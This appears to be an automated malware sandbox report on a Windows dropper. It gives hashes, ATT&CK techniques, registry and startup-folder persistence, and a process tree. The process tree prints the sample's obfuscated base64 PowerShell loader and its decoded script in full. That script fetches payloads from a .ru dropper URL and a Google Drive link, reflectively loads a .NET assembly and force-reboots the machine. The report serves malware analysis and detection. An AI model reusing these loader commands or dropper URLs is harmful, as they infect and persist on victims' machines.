86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880f

Analysis

max time kernel
16s
max time network
16s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
21/09/2024, 11:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe
Size

1.3MB
MD5

b65ebd99cc7c2d3edb769ca10b161860
SHA1

794add2168ddeb0bf878de65a4d36c601c8d08b1
SHA256

86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880f
SHA512

417d39638c0d3c98cb017a95bf2bcb3d48a81ca212728f51bd1784393153c5dd4f26b9c6edecd24cf50b72ab909329018145c6555c79cc8872c383da90c00421
SSDEEP

24576:wDqqL6uZ5XCPss2b21xX2/h9LKkhayrblnWem/tm9GWgY3MhYuKnBpdOh1EUdRGi:w+q5WX1xIpThayr5h9GWgY3MhlKnBpYp

Score

10^/10

discovery execution persistence

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://asboywnrihlvdsbpigftigzyb20gyw5vbnltb3vz.ru/cmfwe2

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer.js	86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer.js	86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\ExplorerJs = "C:\\Windows\\System32\\WScript.exe \"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Explorer.js\""	86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3052	powershell.exe
1840	powershell.exe
2472	powershell.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2480	2844	WerFault.exe	27

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wusa.exe

Modifies registry class 3 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "JSFile"	86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\JSFile\ = "JScript Script File"	86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\JSFile\Shell\Open\Command\ = "C:\\Windows\\SysWow64\\WScript.exe \"%1\" %*"	86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3052	powershell.exe
1840	powershell.exe
2932	powershell.exe
2472	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2844	86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe
Token: SeDebugPrivilege	3052	powershell.exe
Token: SeDebugPrivilege	1840	powershell.exe
Token: SeDebugPrivilege	2932	powershell.exe
Token: SeDebugPrivilege	2472	powershell.exe

Suspicious use of WriteProcessMemory 31 IoCs

description	pid	Process	procid_target
PID 2844 wrote to memory of 1896	2844	86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe	28
PID 2844 wrote to memory of 1896	2844	86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe	28
PID 2844 wrote to memory of 1896	2844	86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe	28
PID 2844 wrote to memory of 1896	2844	86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe	28
PID 1896 wrote to memory of 3052	1896	WScript.exe	29
PID 1896 wrote to memory of 3052	1896	WScript.exe	29
PID 1896 wrote to memory of 3052	1896	WScript.exe	29
PID 1896 wrote to memory of 3052	1896	WScript.exe	29
PID 3052 wrote to memory of 1840	3052	powershell.exe	31
PID 3052 wrote to memory of 1840	3052	powershell.exe	31
PID 3052 wrote to memory of 1840	3052	powershell.exe	31
PID 3052 wrote to memory of 1840	3052	powershell.exe	31
PID 1840 wrote to memory of 2932	1840	powershell.exe	32
PID 1840 wrote to memory of 2932	1840	powershell.exe	32
PID 1840 wrote to memory of 2932	1840	powershell.exe	32
PID 1840 wrote to memory of 2932	1840	powershell.exe	32
PID 2932 wrote to memory of 2692	2932	powershell.exe	33
PID 2932 wrote to memory of 2692	2932	powershell.exe	33
PID 2932 wrote to memory of 2692	2932	powershell.exe	33
PID 2932 wrote to memory of 2692	2932	powershell.exe	33
PID 2932 wrote to memory of 2692	2932	powershell.exe	33
PID 2932 wrote to memory of 2692	2932	powershell.exe	33
PID 2932 wrote to memory of 2692	2932	powershell.exe	33
PID 1840 wrote to memory of 2472	1840	powershell.exe	34
PID 1840 wrote to memory of 2472	1840	powershell.exe	34
PID 1840 wrote to memory of 2472	1840	powershell.exe	34
PID 1840 wrote to memory of 2472	1840	powershell.exe	34
PID 2844 wrote to memory of 2480	2844	86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe	35
PID 2844 wrote to memory of 2480	2844	86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe	35
PID 2844 wrote to memory of 2480	2844	86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe	35
PID 2844 wrote to memory of 2480	2844	86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe	35

C:\Users\Admin\AppData\Local\Temp\86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe
"C:\Users\Admin\AppData\Local\Temp\86d9d88a4ad81b9e0b24ad0ed943fc2ff57724ed850a3a731fff7e354a75880fN.exe"
1⤵
- Drops startup file
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2844
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer.js"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1896
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $fLbjh = 'JA㍿lAEgASg㍿jAGsAIAA9ACAAJA㍿oAG8Acw㍿0AC4AVg㍿lAHIAcw㍿pAG8AbgAuAE0AYQ㍿qAG8AcgAuAEUAcQ㍿1AGEAbA㍿zACgAMgApADsACg㍿JAGYAIAAoACAAJA㍿lAEgASg㍿jAGsAIAApACAAewAKACAAIAAgACAAJA㍿NAGoATA㍿qAHAAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAEkATwAuAFAAYQ㍿0AGgAXQA6ADoARw㍿lAHQAVA㍿lAG0AcA㍿QAGEAdA㍿oACgAKQA7AAoAIAAgACAAIA㍿kAGUAbAAgACgAJA㍿NAGoATA㍿qAHAAIAArACAAJw㍿cAFUAcA㍿3AGkAbgAuAG0Acw㍿1ACcAKQA7AAoAIAAgACAAIAAkAHMAaQ㍿WAHAAUAAgAD0AIAAnAGgAdA㍿0AHAAcwA6AC8ALw㍿kAHIAaQ㍿2AGUALg㍿nAG8Abw㍿nAGwAZQAuAGMAbw㍿tAC8AdQ㍿jAD8AZQ㍿4AHAAbw㍿yAHQAPQ㍿kAG8Adw㍿uAGwAbw㍿hAGQAJg㍿pAGQAPQAnADsACgAgACAAIAAgACQAUQ㍿EAGYARw㍿vACAAPQAgACQAZQ㍿uAHYAOg㍿QAFIATw㍿DAEUAUw㍿TAE8AUg㍿fAEEAUg㍿DAEgASQ㍿UAEUAQw㍿UAFUAUg㍿FAC4AQw㍿vAG4AdA㍿hAGkAbg㍿zACgAJwA2ADQAJwApADsACgAgACAAIAAgAGkAZgAgACgAIAAkAFEARA㍿mAEcAbwAgACkAIA㍿7AAoAIAAgACAAIAAgACAAIAAgACQAcw㍿pAFYAcA㍿QACAAPQAgACgAJA㍿zAGkAVg㍿wAFAAIAArACAAJwAxAGIAcg㍿qADUAag㍿xAG4AcQ㍿SAHgAQw㍿EADYAVg㍿oAGYAaA㍿㍿AG4AMg㍿yAGMAVg㍿mAHMAUg㍿vADcARAA4AGcAcgAnACkAOwAKACAAIAAgACAAfQAgAGUAbA㍿zAGUAIA㍿7AAoAIAAgACAAIAAgACAAIAAgACQAcw㍿pAFYAcA㍿QACAAPQAgACgAJA㍿zAGkAVg㍿wAFAAIAArACAAJwAxAGIAcg㍿qADUAag㍿xAG4AcQ㍿SAHgAQw㍿EADYAVg㍿oAGYAaA㍿㍿AG4AMg㍿yAGMAVg㍿mAHMAUg㍿vADcARAA4AGcAcgAnACkAOwAKACAAIAAgACAAfQA7AAoAIAAgACAAIAAkAE4AeQ㍿CAFkAYwAgAD0AIAAoACAATg㍿lAHcALQ㍿PAGIAag㍿lAGMAdAAgAE4AZQ㍿0AC4AVw㍿lAGIAQw㍿sAGkAZQ㍿uAHQAIAApADsACgAgACAAIAAgACQATg㍿5AEIAWQ㍿jAC4ARQ㍿uAGMAbw㍿kAGkAbg㍿nACAAPQAgAFsAUw㍿5AHMAdA㍿lAG0ALg㍿UAGUAeA㍿0AC4ARQ㍿uAGMAbw㍿kAGkAbg㍿nAF0AOgA6AFUAVA㍿GADgAOwAKACAAIAAgACAAJA㍿OAHkAQg㍿ZAGMALg㍿EAG8Adw㍿uAGwAbw㍿hAGQARg㍿pAGwAZQAoACQAVQ㍿SAEwASw㍿CACwAIAAkAE0Aag㍿MAGoAcAAgACsAIAAnAFwAVQ㍿wAHcAaQ㍿uAC4AbQ㍿zAHUAJwApADsACgAgACAAIAAgACQAQQ㍿VAHIARw㍿GACAAPQAgACgAIAAnAEMAOg㍿cAFUAcw㍿lAHIAcw㍿cACcAIAArACAAWw㍿FAG4Adg㍿pAHIAbw㍿uAG0AZQ㍿uAHQAXQA6ADoAVQ㍿zAGUAcg㍿OAGEAbQ㍿lACAAKQA7AAoAIAAgACAAIAAkAEkAeg㍿qAEEAUQAgAD0AIAAoACAAJA㍿NAGoATA㍿qAHAAIAArACAAJw㍿cAFUAcA㍿3AGkAbgAuAG0Acw㍿1ACcAIAApADsACgAgACAAIAAgAHAAbw㍿3AGUAcg㍿zAGgAZQ㍿sAGwALg㍿lAHgAZQAgAHcAdQ㍿zAGEALg㍿lAHgAZQAgACQASQ㍿6AGoAQQ㍿RACAALw㍿xAHUAaQ㍿lAHQAIAAvAG4Abw㍿yAGUAcw㍿0AGEAcg㍿0ADsACgAgACAAIAAgAEMAbw㍿wAHkALQ㍿JAHQAZQ㍿tACAAJwAlAEQAQw㍿QAEoAVQAlACcAIAAtAEQAZQ㍿zAHQAaQ㍿uAGEAdA㍿pAG8AbgAgACgAIAAkAEEAVQ㍿yAEcARgAgACsAIAAnAFwAQQ㍿wAHAARA㍿hAHQAYQ㍿cAFIAbw㍿hAG0AaQ㍿uAGcAXA㍿NAGkAYw㍿yAG8Acw㍿vAGYAdA㍿cAFcAaQ㍿uAGQAbw㍿3AHMAXA㍿TAHQAYQ㍿yAHQAIA㍿NAGUAbg㍿1AFwAUA㍿yAG8AZw㍿yAGEAbQ㍿zAFwAUw㍿0AGEAcg㍿0AHUAcAAnACAAKQAgAC0AZg㍿vAHIAYw㍿lADsACgAgACAAIAAgAHAAbw㍿3AGUAcg㍿zAGgAZQ㍿sAGwALg㍿lAHgAZQAgAC0AYw㍿vAG0AbQ㍿hAG4AZAAgACcAcw㍿sAGUAZQ㍿wACAAMQA4ADAAJwA7AAoAIAAgACAAIA㍿zAGgAdQ㍿0AGQAbw㍿3AG4ALg㍿lAHgAZQAgAC8AcgAgAC8AdAAgADAAIAAvAGYAOwAKAH0AIA㍿lAGwAcw㍿lACAAewAKACAAIAAgACAAWw㍿TAHkAcw㍿0AGUAbQAuAE4AZQ㍿0AC4AUw㍿lAHIAdg㍿pAGMAZQ㍿QAG8AaQ㍿uAHQATQ㍿hAG4AYQ㍿nAGUAcg㍿dADoAOg㍿TAGUAcg㍿2AGUAcg㍿DAGUAcg㍿0AGkAZg㍿pAGMAYQ㍿0AGUAVg㍿hAGwAaQ㍿kAGEAdA㍿pAG8Abg㍿DAGEAbA㍿sAGIAYQ㍿jAGsAIAA9ACAAewAgACQAdA㍿yAHUAZQAgAH0ACgAgACAAIAAgAFsAUw㍿5AHMAdA㍿lAG0ALg㍿OAGUAdAAuAFMAZQ㍿yAHYAaQ㍿jAGUAUA㍿vAGkAbg㍿0AE0AYQ㍿uAGEAZw㍿lAHIAXQA6ADoAUw㍿lAGMAdQ㍿yAGkAdA㍿5AFAAcg㍿vAHQAbw㍿jAG8AbAAgAD0AIA㍿bAFMAeQ㍿zAHQAZQ㍿tAC4ATg㍿lAHQALg㍿TAGUAYw㍿1AHIAaQ㍿0AHkAUA㍿yAG8AdA㍿vAGMAbw㍿sAFQAeQ㍿wAGUAXQA6ADoAVA㍿sAHMAMQAyAAoAIAAgACAAIAAkAGYAZw㍿IAFkASwAgAD0AIA㍿OAGUAdwAtAE8AYg㍿qAGUAYw㍿0ACAATg㍿lAHQALg㍿XAGUAYg㍿DAGwAaQ㍿lAG4AdAAKACAAIAAgACAAJA㍿mAGcASA㍿ZAEsALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAFQAZQ㍿4AHQALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAXQA6ADoAVQ㍿UAEYAOAAKACAAIAAgACAAJA㍿4AE0AQQ㍿tAEoAIAA9ACAAJA㍿mAGcASA㍿ZAEsALg㍿EAG8Adw㍿uAGwAbw㍿hAGQAUw㍿0AHIAaQ㍿uAGcAKAAnAGgAdA㍿0AHAAOgAvAC8AYQ㍿zAGIAbw㍿5AHcAbg㍿yAGkAaA㍿sAHYAZA㍿zAGIAcA㍿pAGcAZg㍿0AGkAZw㍿6AHkAYgAyADAAZw㍿5AHcANQ㍿2AGIAbg㍿sAHQAYgAzAHYAegAuAHIAdQAvAGMAbQ㍿mAHcAZQAyACcAKQAKACAAIAAgACAAJA㍿mAGcASA㍿ZAEsALg㍿EAGkAcw㍿wAG8Acw㍿lACgAKQAKACAAIAAgACAAJA㍿mAGcASA㍿ZAEsAIAA9ACAATg㍿lAHcALQ㍿PAGIAag㍿lAGMAdAAgAE4AZQ㍿0AC4AVw㍿lAGIAQw㍿sAGkAZQ㍿uAHQACgAgACAAIAAgACQAZg㍿nAEgAWQ㍿LAC4ARQ㍿uAGMAbw㍿kAGkAbg㍿nACAAPQAgAFsAUw㍿5AHMAdA㍿lAG0ALg㍿UAGUAeA㍿0AC4ARQ㍿uAGMAbw㍿kAGkAbg㍿nAF0AOgA6AFUAVA㍿GADgACgAgACAAIAAgACQAeA㍿NAEEAbQ㍿KACAAPQAgACQAZg㍿nAEgAWQ㍿LAC4ARA㍿vAHcAbg㍿sAG8AYQ㍿kAFMAdA㍿yAGkAbg㍿nACgAJA㍿4AE0AQQ㍿tAEoAKQAKACAAIAAgACAAWw㍿CAHkAdA㍿lAFsAXQ㍿dACAAJA㍿SAFgAaQ㍿WAGoAXw㍿ZAGwAdA㍿IAEsAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAEMAbw㍿uAHYAZQ㍿yAHQAXQA6ADoARg㍿yAG8AbQ㍿CAGEAcw㍿lADYANA㍿TAHQAcg㍿pAG4AZwAoACQAeA㍿NAEEAbQ㍿KAC4AUg㍿lAHAAbA㍿hAGMAZQAoACcAkyE6AJMhJwAsACAAJw㍿㍿ACcAKQApAAoAIAAgACAAIA㍿bAFMAeQ㍿zAHQAZQ㍿tAC4AQQ㍿wAHAARA㍿vAG0AYQ㍿pAG4AXQA6ADoAQw㍿1AHIAcg㍿lAG4AdA㍿EAG8AbQ㍿hAGkAbgAuAEwAbw㍿hAGQAKAAkAFIAWA㍿pAFYAag㍿fAFkAbA㍿0AEgASwApAC4ARw㍿lAHQAVA㍿5AHAAZQAoACcAQw㍿sAGEAcw㍿zAEwAaQ㍿iAHIAYQ㍿yAHkAMwAuAEMAbA㍿hAHMAcwAxACcAKQAuAEcAZQ㍿0AE0AZQ㍿0AGgAbw㍿kACgAJw㍿wAHIARg㍿WAEkAJwApAC4ASQ㍿uAHYAbw㍿rAGUAKAAkAG4AdQ㍿sAGwALAAgAFsAbw㍿iAGoAZQ㍿jAHQAWw㍿dAF0AKAAnAHIAZQ㍿yAG8AbA㍿wAHgARQAvAGwAcg㍿1AC8AdQ㍿yAC4Aeg㍿2ADMAYg㍿0AGwAbg㍿iAHYANQ㍿3AHkAZwAwADIAYg㍿5AHoAZw㍿pAHQAZg㍿nAGkAcA㍿iAHMAZA㍿2AGwAaA㍿pAHIAbg㍿3AHkAbw㍿iAHMAYQAvAC8AOg㍿wAHQAdA㍿oACcALAAgACcAJQ㍿EAEMAUA㍿KAFUAJQAnACwAIAAnAHQAcg㍿1AGUAJwApACkACg㍿9ADsA';$fLbjh = $fLbjh.replace('㍿','B') ;$fLbjh = [System.Convert]::FromBase64String( $fLbjh ) ;;;$fLbjh = [System.Text.Encoding]::Unicode.GetString( $fLbjh ) ;$fLbjh = $fLbjh.replace('%DCPJU%','C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer.js') ;powershell $fLbjh
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3052
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$eHJck = $host.Version.Major.Equals(2); If ( $eHJck ) { $MjLjp = [System.IO.Path]::GetTempPath(); del ($MjLjp + '\Upwin.msu'); $siVpP = 'https://drive.google.com/uc?export=download&id='; $QDfGo = $env:PROCESSOR_ARCHITECTURE.Contains('64'); if ( $QDfGo ) { $siVpP = ($siVpP + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr'); } else { $siVpP = ($siVpP + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr'); }; $NyBYc = ( New-Object Net.WebClient ); $NyBYc.Encoding = [System.Text.Encoding]::UTF8; $NyBYc.DownloadFile($URLKB, $MjLjp + '\Upwin.msu'); $AUrGF = ( 'C:\Users\' + [Environment]::UserName ); $IzjAQ = ( $MjLjp + '\Upwin.msu' ); powershell.exe wusa.exe $IzjAQ /quiet /norestart; Copy-Item 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer.js' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force; powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f; } else { [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 $fgHYK = New-Object Net.WebClient $fgHYK.Encoding = [System.Text.Encoding]::UTF8 $xMAmJ = $fgHYK.DownloadString('http://asboywnrihlvdsbpigftigzyb20gyw5vbnltb3vz.ru/cmfwe2') $fgHYK.Dispose() $fgHYK = New-Object Net.WebClient $fgHYK.Encoding = [System.Text.Encoding]::UTF8 $xMAmJ = $fgHYK.DownloadString($xMAmJ) [Byte[]] $RXiVj_YltHK = [System.Convert]::FromBase64String($xMAmJ.Replace('↓:↓', 'A')) [System.AppDomain]::CurrentDomain.Load($RXiVj_YltHK).GetType('ClassLibrary3.Class1').GetMethod('prFVI').Invoke($null, [object[]]('rerolpxE/lru/ur.zv3btlnbv5wyg02byzgitfgipbsdvlhirnwyobsa//:ptth', 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer.js', 'true')) };"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1840
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe C:\Users\Admin\AppData\Local\Temp\\Upwin.msu /quiet /norestart
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2932
      - C:\Windows\SysWOW64\wusa.exe
        
        "C:\Windows\system32\wusa.exe" C:\Users\Admin\AppData\Local\Temp\\Upwin.msu /quiet /norestart
        6⤵
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2692
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2472
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 904
  2⤵
  - Program crash
  PID:2480

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
08ccb96877e46c28b3e03233702028f5

SHA1
7bc3b3499086344d032db9dedb0809f9e6d2d4a0

SHA256
9989dfc5a747831948677429bd125b6381cbe828a72ab5efeabd36afce8ed49b

SHA512
2fe3ed39e28a08a773723ff0047e922fb8b183039198417eab2917c4e6944cf83f32cb66cca3402d505837bf98c4e057b7438086b6af90e1b6e2b6ebf2cdc75b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer.js

Filesize
11KB

MD5
bc2815cd629832eb6587e9bcf1751274

SHA1
417d388a25395fc4d5fe374923a51ba045f5c042

SHA256
644e9e48ac514181291f63cb362ea3b7042045c6b1841ebf6831e534d4fbbce0

SHA512
4a5dd880ae533afde6ff88554818566d5cfef21af116f30e18fdf943728e9b8e58b9b1db331de0e438947233afd786c92fad2f9071d3652e3a16c9868a980248

Download Submit
memory/2844-5-0x00000000006D0000-0x00000000006DA000-memory.dmp

Filesize
40KB

Download
memory/2844-3-0x00000000747D0000-0x0000000074EBE000-memory.dmp

Filesize
6.9MB

Download
memory/2844-4-0x0000000005470000-0x00000000055A0000-memory.dmp

Filesize
1.2MB

Download
memory/2844-6-0x00000000006D0000-0x00000000006DA000-memory.dmp

Filesize
40KB

Download
memory/2844-0-0x00000000747DE000-0x00000000747DF000-memory.dmp

Filesize
4KB

Download
memory/2844-2-0x00000000747D0000-0x0000000074EBE000-memory.dmp

Filesize
6.9MB

Download
memory/2844-1-0x0000000000230000-0x000000000038E000-memory.dmp

Filesize
1.4MB

Download
memory/2844-28-0x00000000747DE000-0x00000000747DF000-memory.dmp

Filesize
4KB

Download
memory/2844-29-0x00000000747D0000-0x0000000074EBE000-memory.dmp

Filesize
6.9MB

Download
memory/2844-30-0x00000000747D0000-0x0000000074EBE000-memory.dmp

Filesize
6.9MB

Download
memory/2844-31-0x00000000006D0000-0x00000000006DA000-memory.dmp

Filesize
40KB

Download
memory/2844-32-0x00000000006D0000-0x00000000006DA000-memory.dmp

Filesize
40KB

Download